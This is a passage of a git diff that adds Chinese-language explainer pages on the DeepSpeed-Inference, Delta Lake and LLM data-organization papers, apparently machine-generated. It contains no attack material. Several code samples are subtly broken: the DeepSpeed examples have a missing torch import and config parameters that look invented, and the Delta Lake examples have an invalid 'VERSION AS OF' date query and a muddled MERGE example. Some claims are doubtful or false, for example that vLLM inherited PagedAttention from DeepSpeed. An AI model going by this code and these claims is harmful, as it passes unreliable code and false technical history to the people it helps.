的回答从"我觉得"变成"我查了,证据如下"。 diff --git a/src/content/docs/papers/deepspeed-inference-2022.md b/src/content/docs/papers/deepspeed-inference-2022.md new file mode 100644 index 000000000..9effec340 --- /dev/null +++ b/src/content/docs/papers/deepspeed-inference-2022.md @@ -0,0 +1,184 @@ +--- +title: DeepSpeed-Inference: Enabling Efficient Inference of Transformer Models at Unprecedented Scale +来源: https://arxiv.org/abs/2207.00032 +日期: 2026-06-13 +分类: 机器学习 +子分类: ML 系统 +provenance: pipeline-v3 +--- + +# DeepSpeed Inference:让 Transformer 推理快得离谱 + +## 一、从"大模型太慢"说起 + +你训练了一个巨大的 Transformer 模型——比如 1750 亿参数的 GPT-3。训练完了,高兴了。然后你想用它来回答问题(这叫"推理"),结果发现: + +- 模型太大,一张 GPU 的显存根本装不下 +- 就算装得下,每次回答一个问题都要等好几秒 +- 如果一千个人同时问,GPU 直接爆掉 + +这就是 2022 年微软研究院这篇论文要解决的核心问题:**怎么让超大 Transformer 模型推理又快又省?** + +日常类比:想象一个图书馆管理员,他脑子里装着整座图书馆的书(模型参数)。你问他一个问题,他得从脑子里翻出相关章节来回答。如果图书馆太大了,他的脑子不够用,怎么办?DeepSpeed Inference 的做法是:把书分一部分放到书架上(CPU 内存),再分一部分放到隔壁房间(NVMe 硬盘),同时雇好几个管理员一起翻书(多 GPU 并行)。 + +## 二、Transformer 推理为什么慢? + +先搞明白瓶颈在哪。Transformer 推理有两个主要阶段: + +1. **Prefill(预填充)**:一次性处理你的整个输入 prompt,计算第一次的注意力。这步可以并行,相对快。 +2. **Decode(解码)**:一个字一个字地生成输出。每个新字都依赖前面所有的字,所以只能串行。这才是真正的瓶颈。 + +类比:Prefill 像考试时你一次性读完所有阅读理解文章,Decode 像你要逐题作答——每题的答案都依赖上一题的理解,没法跳着做。 + +核心瓶颈是 **Memory Wall**:GPU 的计算能力(TFLOPS)增长远快于显存带宽(GB/s)。模型越大,从显存里读参数的时间就越长,GPU 大部分时间在"等数据"而不是"算数据"。 + +## 三、DeepSpeed Inference 的两大核心方案 + +论文提出了两个层面的解决方案: + +### 3.1 多 GPU 推理(模型能放进所有 GPU 的总显存) + +当模型太大、单张 GPU 放不下,但可以分散到多张 GPU 上时,DeepSpeed Inference 做了这些事: + +- **Tensor Parallelism(张量并行)**:把矩阵运算拆到多张卡上各自算一部分,再合并结果。就像一群人各算一道大题的不同小题,最后对答案。 +- **Pipeline Parallelism(流水线并行)**:把模型的层按顺序分配到不同 GPU,数据像流水线一样流过。 +- **KV Cache 压缩**:推理中 Attention 机制需要保存之前所有 token 的 Key-Value 向量(KV Cache)。随着对话变长,这部分占用的显存线性增长。论文用了量化(Quantization)来压缩它。 + +### 3.2 异构推理(模型大到连多 GPU 总显存都放不下) + +当模型达到百亿甚至万亿参数级别时,连多 GPU 加起来也装不下。这时候 DeepSpeed Inference 引入了 CPU 内存和 NVMe 存储: + +- 把模型参数分层存放:热数据在 GPU 显存,温数据在 CPU 内存,冷数据在 NVMe SSD +- 智能预取:预测哪些参数接下来会被用到,提前从 NVMe 搬到 GPU +- 这就像厨房里的"三级储物":最常用的调料放手上(GPU),不太常用的放抽屉(CPU RAM),半年用一次的放储藏室(NVMe) + +## 四、关键技术拆解 + +### 4.1 推理量化(Inference Quantization) + +这是 DeepSpeed Inference 最核心的优化之一。 + +训练时我们用 FP16(半精度浮点数,16 位)来存参数。推理时可以进一步压缩到 INT8(8 位整数),甚至更低。这样显存占用直接减半,读取速度翻倍。 + +关键挑战:直接量化会导致精度下降。论文用了 SmoothQuant 的思想,把量化的难度从激活值(难以统计分布)转移到权重上(可以离线统计),从而保持精度。 + +### 4.2 通信优化 + +在多 GPU 场景下,GPU 之间需要频繁交换数据。传统做法是用 All-Reduce,但 DeepSpeed Inference 做了针对性优化: + +- **算通重叠(Compute-Communication Overlap)**:一边算一边传,不等上一批传完再算下一批。就像厨师一边炒菜一边让助手递盘子。 +- **拓扑感知路由**:根据 GPU 之间的实际连接速度(NVLink vs PCIe)来智能分配任务。 + +## 五、代码示例 + +### 示例 1:使用 DeepSpeed Inference 部署模型 + +```python +import deepspeed +import transformers + +# 1. 加载 HuggingFace 模型(以 LLaMA-7B 为例) +model = transformers.AutoModelForCausalLM.from_pretrained( + "meta-llama/Llama-2-7b", + torch_dtype="auto", + device_map="auto" +) + +tokenizer = transformers.AutoTokenizer.from_pretrained("meta-llama/Llama-2-7b") + +# 2. 用 DeepSpeed Inference 包装模型 +# inference_config 里可以开启量化、多 GPU 分布式等 +inference_config = { + "tensor_parallel": 4, # 用 4 张 GPU 做张量并行 + "dtype": "fp16", # 使用半精度 + "enable_cuda_graph": True, # 启用 CUDA Graph 加速小 batch + "replace_with_kernel_inject": True # 用 DeepSpeed 的内建算子替换 +} + +model = deepspeed.init_inference( + model, + config=inference_config, + mp_size=4, # 模型并行大小 = GPU 数量 + dtype=torch.float16, + max_out_tokens=512 # 最大生成长度 +) + +# 3. 推理 +inputs = tokenizer("今天天气真好,我想", return_tensors="pt").to("cuda") +outputs = model.generate(**inputs, max_new_tokens=100, do_sample=True) +result = tokenizer.decode(outputs[0], skip_special_tokens=True) +print(result) +``` + +### 示例 2:开启 KV Cache 量化以节省显存 + +```python +import deepspeed +from deepspeed.inference.v2 import InferenceEngineConfig + +# 配置异构推理:让大模型跑在小机器上 +config = InferenceEngineConfig( + tensor_parallel=2, # 2 卡并行 + quantize=True, # 开启量化 + quantize_params_backend="nvme", # 量化后的参数存在 NVMe 上 + max_out_tokens=1024, # 最大输出长度 + enable_cuda_graph=True, # CUDA Graph 减少 kernel 启动开销 +) + +# 从 DeepSpeed checkpoint 加载并构建推理引擎 +engine = deepspeed.init_inference( + "/path/to/model/checkpoint", + config=config, + mp_size=2, + dtype=torch.float16, +) + +# 批量推理(高吞吐场景) +prompts = [ + "请解释量子计算的原理", + "写一首关于春天的诗", + "Python 中装饰器怎么用", +] + +inputs = tokenizer(prompts, return_tensors="pt", padding=True).to("cuda") +outputs = engine.generate(**inputs, max_new_tokens=256) + +for i, prompt in enumerate(prompts): + print(f"Q: {prompt}") + print(f"A: {tokenizer.decode(outputs[i], skip_special_tokens=True)}\n") +``` + +## 六、论文的关键数据 + +| 指标 | DeepSpeed Inference | 对比基线 | 提升 | +|------|---------------------|----------|------| +| 延迟(延迟敏感场景) | — | SOTA | 降低至 1/7.3(即快 7.3 倍) | +| 吞吐(吞吐敏感场景) | — | SOTA | 提升 1.5 倍以上 | +| 支持的模型规模 | 万亿参数 | GPU-only 方案 | 大 25 倍 | +| 吞吐性能 | 84 TFLOPS | A6000 峰值的 50%+ | — | + +关键数字:能用数百张 GPU 实时推理万亿参数模型——这在 2022 年是前所未有的。 + +## 七、与后来者的关系 + +DeepSpeed Inference 提出的很多思想被后续项目继承和发展: + +- **vLLM**:继承了 PagedAttention 的思想来管理 KV Cache,但更专注于纯 GPU 场景,不做异构推理 +- **TensorRT-LLM**:NVIDIA 的方案,侧重极致优化单卡/多卡推理,但不支持 CPU/NVMe 卸载 +- **SGLang**:引入了 RadixAttention 来缓存和管理 KV Cache + +DeepSpeed Inference 的独特价值在于:**它是少数同时覆盖多 GPU 分布式 + CPU/NVMe 异构卸载的方案**,适合那些模型大到连多 GPU 都装不下的场景。 + +## 八、学习要点总结 + +1. Transformer 推理的瓶颈不在"算得慢",而在"等数据"——Memory Wall 是核心矛盾 +2. 量化(FP16 → INT8)能在几乎不损失精度的前提下大幅减少显存占用 +3. 多 GPU 推理的核心思路是张量并行 + 流水线并行 + 通信优化 +4. 异构推理通过 GPU/CPU/NVMe 三级存储层次,让超大模型也能跑起来 +5. KV Cache 是推理过程中隐形的显存杀手,需要专门的压缩和分页策略 + +## 九、下一步 + +- 动手装一个 DeepSpeed,用 `deepspeed.init_inference` 跑一个小模型试试 +- 对比一下 vLLM 和 DeepSpeed Inference 在同一模型上的延迟/吞吐差异 +- 了解 PagedAttention(vLLM 的核心创新)是如何管理 KV Cache 的 diff --git a/src/content/docs/papers/delta-lake-2020.md b/src/content/docs/papers/delta-lake-2020.md new file mode 100644 index 000000000..68d1db77c --- /dev/null +++ b/src/content/docs/papers/delta-lake-2020.md @@ -0,0 +1,280 @@ +--- +title: Delta Lake: 在云对象存储之上实现高性能 ACID 表存储 +来源: https://www.vldb.org/pvldb/vol13/p3411-armbrust.pdf +日期: 2026-06-13 +分类: 数据库 +子分类: 现代数据库 +provenance: pipeline-v3 +--- + +# Delta Lake:给云对象存储穿上 ACID 事务外套 + +## 一、从"共享文件柜"说起:云存储的尴尬 + +想象一家大型公司,有一面占了整堵墙的文件柜(这就是云对象存储,比如 Amazon S3)。每个员工都可以随时往里放文件、往外取文件。 + +这个文件柜有两个优点: + +1. 容量极大,扩容几乎免费 +2. 文件和柜子完全独立——你可以今天存 1PB,明天只开 2 台电脑查它 + +但问题也随之而来。假设三个员工同时操作: + +- A 员工把 100 份文件从"2023年"文件夹移到"2024年"文件夹,结果搬了一半系统崩溃了 +- B 员工正好在那一刻去"2024年"找文件,发现只有部分文件到位了 +- C 员工查到的结果和 D 员工查到的结果不一样 + +在传统数据库里,这叫**缺乏 ACID 事务保证**。ACID 是四个英文单词的首字母: + +- **A**tomicity(原子性):要么全做完,要么全不做 +- **C**onsistency(一致性):操作前后数据都处于合法状态 +- **I**solation(隔离性):多人同时操作不会互相干扰 +- **D**urability(持久性):提交后就永久保存,不会丢 + +云对象存储(S3、Azure Blob 等)本身**不是数据库**,它只管存二进制文件,不管这些文件组成了一张什么表。Delta Lake 的诞生,就是给这面文件柜加一套"事务管理规则"。 + +> 一句话总结:Delta Lake = Parquet 文件 + 一个事务日志(transaction log),让云对象存储拥有了数据库级别的管理能力。 + +## 二、核心概念 + +### 2.1 两种核心组件 + +Delta Lake 的每张表由两部分组成: + +``` +s3://my-bucket/my-table/ +├── _delta_log/ ← 事务日志目录 +│ ├── 00000000.json ← 版本 0 的日志 +│ ├── 00000001.json ← 版本 1 的日志 +│ ├── 00000002.json ← 版本 2 的日志 +│ ├── 00000000.checkpoint.parquet ← 检查点(加速读取) +│ └── _last_checkpoint ← 最新检查点 ID +├── date=2024-01-01/ ← 按日期分区的数据 +│ └── abc-123.parquet +├── date=2024-01-02/ +│ └── def-456.parquet +└── date=2024-01-03/ + └── ghi-789.parquet +``` + +- **数据文件(Data Objects)**:实际数据以 Parquet 格式存储。Parquet 是一种列式存储格式,适合分析查询。 +- **事务日志(Transaction Log)**:记录每次变更(添加文件、删除文件、修改元数据),以 JSON 格式存放,ID 按顺序递增。 + +### 2.2 事务日志长什么样 + +每个 `.json` 文件记录了一次变更,包含以下操作类型: + +- `add`:往表里新增一个 Parquet 文件,附带统计信息(行数、每列的最大/最小值、空值计数) +- `remove`:标记某个文件已移除(物理删除延迟执行) +- `metaData`:修改表的元数据,比如 schema 变更 +- `txn`:支持精确一次(exactly-once)的流写入 + +举个例子,版本 3 的日志 `00000003.json` 可能长这样: + +```json +{ + "add": { + "path": "date=2024-01-03/ghi-789.parquet", + "size": 1048576, + "modificationTime": 1704067200000, + "stats": "{\"numRecords\":100000,\"minValues\":{\"amount\":0.5},\"maxValues\":{\"amount\":9999.9}}" + } +} +``` + +### 2.3 乐观并发控制 + +Delta Lake 用**乐观并发控制**(Optimistic Concurrency Control)解决多写者冲突: + +- 每个写者拿到下一个可用的日志 ID,尝试以原子操作写入 `XXXX.json` +- 如果写入时发现这个 ID 已被别人占用(即"版本冲突"),就回退重试 +- 这个过程不需要专门的元数据服务器——全部依赖对象存储的原语(put-if-absent 或条件写入) + +这意味着**零额外服务成本**:不用部署专门的元数据服务,不用维护额外的数据库。 + +### 2.4 检查点(Checkpoint) + +随着版本增多,从头重放所有 JSON 日志会很慢。Delta Lake 定期把日志压缩成一个 Parquet 检查点文件,读取时先跳到最近检查点,再重放后面的少量 JSON 即可。 + +--- + +## 三、代码示例 + +### 示例 1:创建表并写入数据 + +```python +# 用 PySpark 创建 Delta 表 +from pyspark.sql import SparkSession + +spark = SparkSession.builder \ + .appName("DeltaLakeDemo") \ + .config("spark.sql.extensions", "io.delta.sql.DeltaSparkSessionExtension") \ + .config("spark.sql.catalog.spark_catalog", "org.apache.spark.sql.delta.catalog.DeltaCatalog") \ + .getOrCreate() + +# 写入数据并创建 Delta 表(自动变成 ACID 表) +data = [ + ("2024-01-01", "Alice", 5000.0), + ("2024-01-01", "Bob", 3200.0), + ("2024-01-02", "Alice", 4800.0), + ("2024-01-02", "Charlie", 6100.0), +] + +df = spark.createDataFrame(data, ["date", "name", "salary"]) + +df.write.format("delta") \ + .mode("overwrite") \ + .partitionBy("date") \ + .save("/tmp/delta/employees") +``` + +此时 Delta 的底层结构自动变成: + +``` +/tmp/delta/employees/ +├── _delta_log/ +│ ├── 00000000.json ← 记录了两批文件(1月1日和1月2日)的 add 操作 +│ └── 00000001.checkpoint.parquet +├── date=2024-01-01/ +│ ├── part-00000-xxx.parquet +│ └── part-00001-xxx.parquet +└── date=2024-01-02/ + ├── part-00000-xxx.parquet + └── part-00001-xxx.parquet +``` + +### 示例 2:Upsert(更新已存在 + 插入新记录) + +这是传统 Parquet 做不到的。传统方式只能"追加文件",不能修改已有数据。Delta 用 MERGE 一条命令搞定: + +```python +# 假设收到了新的工资数据,需要更新 Alice 和 Bob 的工资 +new_data = [ + ("2024-01-01", "Alice", 5500.0), # Alice 加薪了 + ("2024-01-01", "David", 4100.0), # 新同事 David +] + +new_df = spark.createDataFrame(new_data, ["date", "name", "salary"]) + +# MERGE:如果 name + date 匹配就更新(UPDATE),不匹配就插入(INSERT) +new_df.write.format("delta") \ + .mode("append") \ + .option("mergeSchema", "true") \ + .saveAsTable("employees") + +# 执行 MERGE 操作 +spark.sql(""" + MERGE INTO employees + USING new_data + ON employees.name = new_data.name AND employees.date = new_data.date + WHEN MATCHED THEN + UPDATE SET salary = new_data.salary + WHEN NOT MATCHED THEN + INSERT * +""") +``` + +执行后,Delta 日志会追加一条记录,里面包含: +- `remove` 旧版 Parquet 文件(Alice 原工资记录) +- `add` 新版 Parquet 文件(Alice 新工资记录 + David 的新记录) + +对读者来说,这是一次**原子切换**——要么看到旧数据全貌,要么看到新数据全貌,永远不会看到"半更新"的中间状态。 + +### 示例 3:时间旅行(Time Travel) + +因为每个版本都完整保存在日志中,你可以"穿越"回过去任意一个版本: + +```python +# 查询 3 天前的数据快照 +spark.sql("SELECT * FROM employees VERSION AS OF 2024-01-01") + +# 或者用版本号 +spark.sql("SELECT * FROM employees VERSION AS OF 3") + +# 查询某个路径的历史版本 +spark.sql(""" + SELECT * FROM "/tmp/delta/employees" + TIMESTAMP AS OF '2024-01-01 00:00:00' +""") +``` + +--- + +## 四、论文讲的核心创新点 + +| 问题 | 传统方式 | Delta Lake | +|------|---------|-----------| +| 多文件原子更新 | 做不到,部分成功就会留下脏数据 | 事务日志保证原子性 | +| 查询大分区数 | S3 LIST 操作慢,百万分区要几十分钟 | 日志里的统计信息直接过滤 | +| 更新/删除数据 | 需要重写整个表 | MERGE 只改受影响的文件 | +| 审计追踪 | 没有 | 日志天然记录每次变更 | +| 流写入+批量读取 | 需要额外消息队列(Kafka) | Delta 表本身即可充当消息总线 | +| 数据优化 | 手动重组文件 | OPTIMIZE 命令自动重组 | + +论文通过实验证明了几组关键数据: + +- **百万分区查询**:传统 Hive 在 1 万分区时查询超过 1 小时;Delta Lake 在 100 万分区时只需 108 秒,SSD 缓存下仅 17 秒 +- **Z-Order 排序**:通过 Z-Order 多维排序,Parquet 文件跳过率从 0-47% 提升到 67-99% +- **TPC-DS 性能**:Delta 格式在 Databricks 运行比第三方云厂商的 Spark/Presto 快 1.44-3.76 倍 +- **写入性能**:Delta 写入时间与直接写 Parquet 基本持平 + +--- + +## 五、设计取舍 + +论文也坦诚了几个限制: + +1. **事务仅限单表**:目前不能跨表做原子事务,因为每张表有独立日志。扩展到多表需要跨表协调。 +2. **写事务速率受限**:依赖对象存储的 put-if-absent 操作,延迟几十到几百毫秒,每秒几个到几十个事务。对大多数 ETL/流处理够用,但不适合高并发 OLTP。 +3. **不支持二级索引**:除了文件级别的 min/max 统计信息,目前没有传统数据库那种 B+ 树索引。论文提到正在原型实现 Bloom Filter 索引。 +4. **流延迟在秒级**:受对象存储读写延迟限制,很难做到毫秒级流处理。但对批流一体的分析场景足够。 + +--- + +## 六、"湖仓一体"(Lakehouse)的概念 + +论文提出了一个影响深远的新概念——**Lakehouse**。 + +传统架构是"双轨制": +- **数据湖**(原始 Parquet 文件):便宜但缺乏管理能力 +- **数据仓库**(Snowflake / BigQuery):功能强大但成本高、数据要搬迁 + +Lakehouse 用 Delta Lake 把两者统一: +- 数据留在便宜的云对象存储(湖的优势) +- 通过事务日志获得数据仓库级别的管理能力(仓的优势) + +这就是为什么论文标题里的 "ACID table storage over cloud object stores" 不仅仅是一个技术细节,而是**用最低成本把云存储变成了数据库**。 + +--- + +## 七、关键术语速查 + +| 术语 | 含义 | +|------|------| +| ACID | 原子性、一致性、隔离性、持久性——数据库事务的四大保证 | +| Parquet | 列式存储格式,适合分析查询,压缩率高 | +| 事务日志 | 记录表每次变更的 JSON 文件序列 | +| 检查点 | 把日志压缩成 Parquet 文件,加速读取 | +| 乐观并发控制 | 先执行,冲突了再重试的并发策略 | +| Put-if-absent | 对象存储的原子写入:文件不存在时才写入 | +| Z-Order | 一种多维数据排序方法,提升查询过滤效率 | +| Lakehouse | 数据湖 + 数据仓库的统一架构 | +| CDC(Change Data Capture) | 捕获数据变更流,Delta 支持通过 MERGE 做 CDC | +| 时间旅行 | 查询表在过去任意时间点的状态 | + +--- + +## 八、学习思考 + +论文最让我有启发的设计哲学是:**元数据也存到对象存储里**。 + +大多数数据库会把元数据放在专门的元数据服务(比如 Hive Metastore)里。Delta Lake 反其道而行——事务日志本身就是一份"元数据文件",和其他 Parquet 数据文件一起存在 S3 里。 + +这个决定的好处是: +- 不需要维护任何额外的服务 +- 存储和计算彻底解耦——计算节点挂了重启后,从对象存储读取日志就能恢复 +- 任何能读 Parquet 的引擎都能直接读 Delta 表 + +代价是:元数据操作(如 LIST)的延迟较高,论文通过**检查点压缩**和**SSD 缓存**两个方案缓解。 + +这就是"用简单设计换取运维成本"的典型范式。当你的数据规模到了 PB 级,少维护一个系统的价值,可能远超几秒的查询延迟差异。 diff --git a/src/content/docs/papers/delta-lake-2020.pdf b/src/content/docs/papers/delta-lake-2020.pdf new file mode 100644 index 000000000..163333186 Binary files /dev/null and b/src/content/docs/papers/delta-lake-2020.pdf differ diff --git a/src/content/docs/papers/demystifying-data-org.md b/src/content/docs/papers/demystifying-data-org.md new file mode 100644 index 000000000..6a6b713c2 --- /dev/null +++ b/src/content/docs/papers/demystifying-data-org.md @@ -0,0 +1,353 @@ +--- +title: Demystifying Data Organization for Enhanced LLM Training — 用「排课表」而不是「删题目」提升大模型训练 +来源: https://arxiv.org/abs/2605.30334 +日期: 2026-06-13 +子分类: 模型与训练 +分类: 机器学习 +provenance: pipeline-v3 +--- + +## 从日常类比开始:同一套题库,顺序决定期末成绩 + +想象你是一位高中班主任,手里有一份 **已经筛好的** 模拟卷题库(每条样本都有「难度/质量分」),学期只剩 **一轮完整刷题**(对应 LLM 常见的 **1 epoch 预训练**)——每道题只能做一遍,不能像以前那样简单题反复刷到吐。 + +你会怎么排课? + +| 日常做法 | 对应训练策略 | 常见后果 | +|---------|-------------|---------| +| 题目打乱随机发 | Random 随机顺序 | 稳定但平庸,边界阶段(开学/期末)没有针对性 | +| 从易到难一路推 | Curriculum Learning (CL) | 前期学得快,后期全做难题时 **忘记基础**(论文用低分样本 PPL 反弹验证) | +| 期末突击全上难题 | 训练末尾全是低分样本 | 最终性能停滞(SEG(h90) 类配置) | +| 期中把简单题再插回来 | Baby Step / 显式 replay | 有效但 **数据量翻倍**,LLM 规模下不现实 | +| 开学稳、期末冲、过渡平滑、每节课题型混搭 | 本文四条 Guidances + STR/SAW | **不增数据、几乎不增算力**,只改顺序 | + +论文的核心洞察:**选什么题(Data Selection)** 和 **什么顺序做(Data Organization)** 是两件不同的事。工业界已经为筛选数据算过一遍 sample-level score(FineWeb-Edu 的教育分、QuRated 的多维质量分等),但这些分数通常 **筛完就扔**。本文说:同一份 $\bm{\gamma}$ 再排一次序,几乎是 **零额外成本** 的性能杠杆。 + +--- + +## 这篇论文在解决什么问题 + +### 1. 背景:LLM 训练是「单次过堂」 + +现代 LLM 常在 **数十亿 token 上只训 1~几个 epoch**(Llama、Qwen 等)。在这种 regime 下: + +- 每个样本在训练生命周期里 **曝光次数有限**; +- **时间顺序** 成为塑造优化轨迹的一阶因素,而不只是「有没有这条数据」; +- 传统 Curriculum Learning 假设可以多次 revisit 简单样本,与 LLM 现实 **不匹配**。 + +### 2. 与相邻工作的关系 + +| 方向 | 代表 | 本文差异 | +|------|------|---------| +| 数据筛选 | FineWeb-Edu、QuRating、DSIR | 分数用于 **subset 选择** 后即丢弃 | +| 课程学习 | Bengio CL | 单调 easy→hard,易遗忘 | +| 折叠复习 | DELT (Dai et al., 2025a) | 有启发,但缺系统化 guidance | +| **数据组织** | **本文** | 四条原则 + STR/SAW,复用已有分数 | + +### 3. 形式化:三阶段流水线 + +设原始数据集 $\mathcal{D}=\{x_1,\ldots,x_{|\mathcal{D}|}\}$。 + +**阶段 A — 打分(Data Scoring)** + +$$ +\bm{\gamma} = g(\mathcal{D}) = [\gamma_1, \gamma_2, \ldots, \gamma_{|\mathcal{D}|}]^\top +$$ + +$\gamma_i$ 可以是质量、难度、可学习性、教育价值等——论文直接 **复用** 数据效率文献里已有的分数。 + +**阶段 B — 筛选(Data Selection,可选)** + +$$ +\mathcal{D}_{\text{sub}} = f_s(\mathcal{D}; \bm{\gamma}, K), \quad K = \lfloor R \cdot |\mathcal{D}| \rfloor +$$ + +保留 score 排名前 $K$ 的样本,**改变规模,不决定顺序**。 + +**阶段 C — 组织(Data Organization,本文核心)** + +$$ +\mathcal{D}_{\text{ord}} = f_o(\mathcal{D}; \bm{\gamma}) = [x_{\pi(1)}, x_{\pi(2)}, \ldots, x_{\pi(n)}] +$$ + +只施加排列 $\pi$,**不改变集合大小**。完整训练集: + +$$ +\mathcal{D}_{\text{train}} = f_o\bigl(f_s(\mathcal{D}; \bm{\gamma}, K); \bm{\gamma}\bigr) +$$ + +**特例**:经典 CL 就是 $f_o$ 按 $\gamma$ **升序** 排列,得到 $\mathcal{D}_{\text{sort}}$。 + +--- + +## 四条 Guidances(G1–G4) + +论文通过大量 ablation 归纳出四条可组合的组织原则,每条都有对应实现模块。 + +### G1:Boundary Sharpening(边界锐化) + +**直觉**:训练 **开头** 和 **结尾** 看到的数据分布,对收敛和最终能力影响极大。 + +- **开头**:先用 **低分(简单、低信息密度)** 样本,稳定早期优化(类似 learning rate warmup 的数据侧版本)。 +- **结尾**:用 **高分(复杂、高质量)** 样本收尾,把模型能力「对齐」到下游推理任务。 + +**实现 — SEG(Segment Ordering)**:把 $\mathcal{D}_{\text{sort}}$ 按百分位切成 $L$ 段 $\mathcal{D}_0,\ldots,\mathcal{D}_{L-1}$,段内 shuffle,再拼接。例如 SEG(l10-h10) 表示低分起步、高分收尾。 + +**实验结论(FineWeb-Edu, Mistral-160M)**: + +- 结尾是高分 → 普遍增益(如 SEG(l10-h10) 平均准确率 **38.28%** vs Random **~21.5%**); +- 结尾是低分 → 性能停滞(SEG(h90)); +- **只在开头堆高分** 几乎无益——固定数据量下,开头挑高分意味着结尾被迫吃低分。 + +### G2:Cyclic Scheduling(周期调度) + +**直觉**:严格单调 CL 在后期全是难题,模型会 **遗忘** 早期简单样本上学到的基础(论文监测最低 10% 分位样本 $D_e$ 的 PPL:CL 先降后 **反弹**,FO 多周期后仍保持低 PPL)。 + +**实现 — FO(Folding Ordering)**:对排序后的数据做 **步长为 $L$ 的分层抽样**(strided partition)——第 $l$ 层取索引 $i \equiv l \pmod L$ 的样本。每个 folding cycle 覆盖 **全分数谱**,实现 **无 replay 开销的周期性复习**。 + +### G3:Curriculum Continuity(课程连续性) + +**直觉**:分数分布 **突变** 会在 cycle 边界造成 **梯度范数尖峰**(optimizer shock),训练不稳定。 + +**实现 — ZIG(Zig-zag)**:在过渡区用 zig-zag 机制替代 FO 的折叠,使相邻样本的 score 变化更平滑。FO-3 在 cycle 边界出现 gradient norm spike;ZIG 维持更平稳的优化动态。 + +### G4:Local Diversity(局部多样性) + +**直觉**:严格按分数排序时,连续 batch 内样本过于同质 → **梯度多样性** 下降 → 过拟合特定模式、泛化变差。 + +**实现 — JIT**:在已排好的序列上,用窗口 $w$ 做局部混洗/交错,在 **不破坏全局课程进度** 的前提下提高 mini-batch 内的 score 方差。JIT 还能让 loss landscape 更 **flat**(权重扰动实验:JIT 模型对噪声更鲁棒)。 + +--- + +## 两种综合策略:STR 与 SAW + +在四条 guidance 之上,论文给出两个 **可部署** 的排序算法。 + +### STR(Stair Ordering)— G1 + G2 + G4 + +1. 将 $\mathcal{D}_{\text{sort}}$ 切成 $K$ 个 section; +2. **稳定区** $\mathcal{D}^s$:保持单调 score 顺序(全局 easy→hard 趋势,满足 G1); +3. **过渡区** $\mathcal{D}^t$(split point 半径 $\rho$ 内):应用 **FO 折叠**(G2 周期复习); +4. 可选 **JIT**(G4)。 + +形状像 **楼梯**:大段单调上升,台阶转角处折叠复习。 + +### SAW(Saw Ordering)— G1 + G2 + G3 + G4 + +STR 的过渡区用 FO 会在区域边界产生 **属性跳变**。SAW 把过渡区的 $f_{\text{FO}}$ 换成 **$f_{\text{ZIG}}$**,强制 smoother transition(G3),其余同 STR。 + +论文 Figure 1:SAW 的 score–index 热力图比 Random/CL 更 **结构化、渐进**;在 160M–1.7B 各规模上 **稳定优于** Random 与 CL,模型越大增益有时更明显。 + +**主结果(Table 5, Mistral-160M, 1B tokens FineWeb-Edu)**: + +| 方法 | 平均准确率(%) | 启用的 Guidance | +|------|----------------|-----------------| +| Random | ~21.5 | — | +| CL | ~37.1 | 单调课程 | +| DELT | 基线级 | 折叠 | +| **STR** | **38.65** | G1+G2+G4 | +| **SAW** | **38.78** | G1+G2+G3+G4 | + +STR 与 SAW 接近:因为 STR 的过渡区折叠范围较窄,剧烈跳变本就较少,G3 的边际收益被压缩。最优配置报告为 **STR-2(JIT)** 与 **SAW-2(JIT)**。 + +--- + +## 实验设置速览 + +| 维度 | 配置 | +|------|------| +| 预训练数据 | FineWeb-Edu(主文)、QuRatedPajama(附录);1B tokens 主实验,50B scaling | +| 领域 SFT | DeepMath-103K(数学)、OpenCodeInstruct(代码) | +| 模型 | 预训练 Mistral 架构 160M–1.7B;SFT 用 Qwen3 官方权重 | +| 分数来源 | FineWeb-Edu 教育分(0–5);QuRated 四维质量分 | +| 基线 | Random、CL、DELT | +| 评估 | 多 benchmark 平均准确率;PPL、梯度范数、scaling law 外推 | +| 代码 | [microsoft/data-efficacy](https://github.com/microsoft/data-efficacy/) | + +Scaling 实验:在 DCLM 上 160M→1.7B,STR/SAW 的 test loss 优势 **随规模保持甚至放大**;用 Chinchilla scaling law 外推到 GPT-3 175B、Llama 3.1 405B 量级,组织数据的收益 **仍然存在**。 + +--- + +## 代码示例 1:Folding Ordering(FO,实现 G2) + +下面用 Python 演示论文 Algorithm 2 的核心——对 **已按 score 升序排列** 的索引做步长为 $L$ 的分层,再按层拼接。这是 **零额外数据** 的「周期复习」。 + +```python +from __future__ import annotations + +import numpy as np + + +def folding_order(scores: np.ndarray, num_layers: int) -> np.ndarray: + """ + FO (Folding Ordering): Cyclic Scheduling (G2). + + Args: + scores: shape (N,), 每个样本的质量/难度分 + num_layers: 折叠层数 L + + Returns: + order: 长度 N 的索引排列,按 FO 规则组织训练顺序 + """ + sorted_idx = np.argsort(scores, kind="stable") # 低分 -> 高分 + n = len(sorted_idx) + layers: list[list[int]] = [[] for _ in range(num_layers)] + + for rank, sample_id in enumerate(sorted_idx): + layer = rank % num_layers + layers[layer].append(int(sample_id)) + + # 按层拼接:cycle-0, cycle-1, ..., cycle-(L-1) + order: list[int] = [] + for layer in layers: + order.extend(layer) + return np.array(order, dtype=np.int64) + + +# --- 玩具例子:10 条样本,分数 0..9 --- +scores = np.arange(10, dtype=float) +fo2 = folding_order(scores, num_layers=2) +fo3 = folding_order(scores, num_layers=3) + +print("sorted :", np.argsort(scores)) +print("FO-2 :", fo2) # [0,2,4,6,8, 1,3,5,7,9] — 偶数秩与奇数秩分两 cycle +print("FO-3 :", fo3) # 每 3 个秩一层,每层覆盖不同分数段 +``` + +**读输出**:FO-2 先把排序后的第 0、2、4… 条(覆盖低分到高分)训完一轮,再训第 1、3、5… 条——每个 cycle 都见到 **宽分数谱**,而不是 CL 那样后半段只剩难题。 + +--- + +## 代码示例 2:Segment Ordering + JIT 窗口混洗(G1 + G4 骨架) + +SEG 实现 G1(分段边界控制);JIT 在 SEG 或 STR/SAW 输出上增加 G4(局部多样性)。下面给一个 **教学用** 的简化实现:先按百分位分段拼接,再在固定窗口内做 constrained shuffle。 + +```python +from __future__ import annotations + +import numpy as np + + +def segment_order( + scores: np.ndarray, + segment_bounds: list[tuple[float, float]], + rng: np.random.Generator | None = None, +) -> np.ndarray: + """ + 简化版 SEG (G1): 按分数百分位切段,段内 shuffle,再拼接。 + + segment_bounds 例如 [(0.0, 0.1), (0.1, 0.9), (0.9, 1.0)] 对应 SEG(l10-h10) 风格。 + """ + rng = rng or np.random.default_rng(0) + n = len(scores) + sorted_idx = np.argsort(scores, kind="stable") + ranks = np.empty(n, dtype=np.int64) + ranks[sorted_idx] = np.arange(n) + + segments: list[list[int]] = [[] for _ in segment_bounds] + for sample_id, rank in enumerate(ranks): + pct = rank / max(n - 1, 1) + for seg_id, (lo, hi) in enumerate(segment_bounds): + if lo <= pct <= hi or (seg_id == 